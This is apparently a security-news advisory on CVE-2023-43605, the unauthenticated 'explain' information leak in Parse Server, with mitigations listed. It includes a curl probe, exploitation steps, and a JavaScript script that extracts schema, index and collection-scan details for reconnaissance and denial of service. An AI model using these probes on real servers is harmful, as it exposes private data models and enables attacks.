CVE-2023-43605 stems from Parse Server's missing authorization check on the `explain` query option, which it passes straight through to MongoDB's `explain()` method. Run on a query, `explain()` returns the database engine's detailed execution plan. Parse Server's REST endpoints did not require the master key for such explain queries, so any unauthenticated or low-privilege client holding only the public application ID could send them. By crafting a query and appending the `explain=true` parameter, an attacker could probe the database one class at a time. The returned plan reveals the collection namespace, the stages the planner chose, whether an index was used and which one (its name and key pattern, and therefore the indexed field names), the plans that were rejected, and statistics on keys and documents examined. This exposes the database's schema structure, including field names, and gives detailed insight into its indexing strategy. An attacker can use this data to map the application's data model and to identify weaknesses for further exploitation, for example by finding queries that cannot use any index and replaying them to degrade performance.
Platform: Parse Server
Version: <5.4.5
Vulnerability: Information Disclosure
Severity: Medium
Date: 2023-10-xx
Prediction: Patch Available
What Undercode Say:
`curl -g -X GET "http://parse-server:1337/parse/classes/User?where={\"key\":\"value\"}&explain=true" -H "X-Parse-Application-Id: yourAppId"` (the `-g` flag stops curl from treating the braces in `where` as a glob pattern; no master key header is needed on a vulnerable version)
`db.collection.find({…}).explain("executionStats")` (the MongoDB shell call whose output the request above returns)
How to Exploit:
Craft malicious queries.
Append explain parameter.
Analyze execution plan.
Extract schema/index data.
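The last two steps, analyzing the plan and extracting schema and index data, as an added example that is not part of the original post and not Parse Server code. It walks a MongoDB `explain("executionStats")` document and pulls out the collection namespace, field names (from index key patterns and plan filters), index names, whether the winning plan was a collection scan, and how many documents were read per document returned. The sample document is constructed for the example; its namespace, field names and index name are invented, and the assumption is that the explain document has already been extracted from Parse Server's JSON response.

```javascript
'use strict';

// Constructed sample of what MongoDB's explain("executionStats") returns for
// a query that used a compound index. The namespace, field and index names
// are invented for this example and are not taken from any real deployment.
const SAMPLE_EXPLAIN = {
  queryPlanner: {
    namespace: 'appdb.User',
    winningPlan: {
      stage: 'FETCH',
      filter: { accountStatus: { $eq: 'active' } },
      inputStage: {
        stage: 'IXSCAN',
        keyPattern: { email: 1, createdAt: -1 },
        indexName: 'email_1_createdAt_-1',
        isUnique: false,
      },
    },
    rejectedPlans: [
      { stage: 'COLLSCAN', filter: { email: { $eq: 'a@example.com' } } },
    ],
  },
  executionStats: {
    nReturned: 1,
    executionTimeMillis: 3,
    totalKeysExamined: 1,
    totalDocsExamined: 1,
  },
};

// Field names are the keys of a filter; $and/$or/$nor wrap arrays of
// sub-filters, so recurse into those instead of treating them as fields.
function collectFilterFields(filter, fields) {
  if (Array.isArray(filter)) {
    filter.forEach(f => collectFilterFields(f, fields));
    return;
  }
  if (!filter || typeof filter !== 'object') return;
  for (const [key, value] of Object.entries(filter)) {
    if (key.startsWith('$')) collectFilterFields(value, fields);
    else fields.add(key);
  }
}

// Walk a plan tree (inputStage for single-child stages, inputStages for
// multi-child stages such as $or), harvesting stage types, index names,
// key-pattern fields and filter fields. Only the winning plan decides
// whether the query actually ran as a collection scan.
function walkStages(stage, out, winning) {
  if (!stage || typeof stage !== 'object') return;
  if (stage.stage) out.stages.push(stage.stage);
  if (winning && stage.stage === 'COLLSCAN') out.collscan = true;
  if (stage.indexName) out.indexes.add(stage.indexName);
  if (stage.keyPattern) Object.keys(stage.keyPattern).forEach(f => out.fields.add(f));
  if (stage.filter) collectFilterFields(stage.filter, out.fields);
  walkStages(stage.inputStage, out, winning);
  (stage.inputStages || []).forEach(s => walkStages(s, out, winning));
}

// Summarise what one explain document gives away.
function summarizeExplain(doc) {
  const out = { stages: [], indexes: new Set(), fields: new Set(), collscan: false };
  const qp = doc.queryPlanner || {};
  walkStages(qp.winningPlan, out, true);
  (qp.rejectedPlans || []).forEach(p => walkStages(p, out, false));
  const es = doc.executionStats || {};
  return {
    namespace: qp.namespace || null,
    fields: [...out.fields].sort(),
    indexes: [...out.indexes].sort(),
    stages: out.stages,
    usesCollectionScan: out.collscan,
    docsExamined: es.totalDocsExamined,
    keysExamined: es.totalKeysExamined,
    returned: es.nReturned,
    // Documents read per document returned: a high ratio on a public endpoint
    // marks a query an attacker can replay to burn server resources.
    scanRatio: es.nReturned ? es.totalDocsExamined / es.nReturned : null,
  };
}

console.log(JSON.stringify(summarizeExplain(SAMPLE_EXPLAIN), null, 2));
```

Running the summary over every class name an attacker can guess turns a pile of explain responses into a list of collections, their indexed fields and which queries the server cannot serve from an index, which is exactly the reconnaissance the advisory describes.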
Protection from this CVE:
Set `databaseOptions.allowPublicExplain` to `false`.
Require master key.
Implement blocking middleware.
Upgrade Parse Server.
Impact:
Schema information leakage.
Index configuration exposure.
Performance metric disclosure.
DoS attack vector creation.
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

